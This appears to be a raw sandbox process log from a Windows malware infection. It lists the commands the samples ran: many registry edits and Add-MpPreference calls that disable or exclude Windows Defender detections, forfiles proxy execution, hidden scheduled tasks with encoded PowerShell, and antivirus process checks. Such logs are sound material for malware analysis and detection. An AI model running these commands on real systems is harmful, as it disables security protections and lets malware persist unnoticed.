"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD01E.tmp"
C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe
"C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe'
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'IerLRtXpEcMnUjz.exe'
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x120,0x130,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\cmd.exe'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe
"C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Users\Admin\Desktop\a\Newoff.exe
C:\Users\Admin\Desktop\a\Newoff.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:64;"
C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup.exe
"C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup.exe" /c:WW.Peter.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo=
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
C:\Program Files (x86)\1717260008_0\360TS_Setup.exe
"C:\Program Files (x86)\1717260008_0\360TS_Setup.exe" /c:WW.Peter.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'cmd.exe'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gHUBkzNBz" /SC once /ST 00:06:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gHUBkzNBz"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "cmd" /tr "C:\ProgramData\cmd.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gHUBkzNBz"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 05:18:14 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fpNSkKK.exe\" 0c /PspKdidaZ 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fpNSkKK.exe
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fpNSkKK.exe 0c /PspKdidaZ 385118 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7664 -ip 7664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7664 -s 688
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
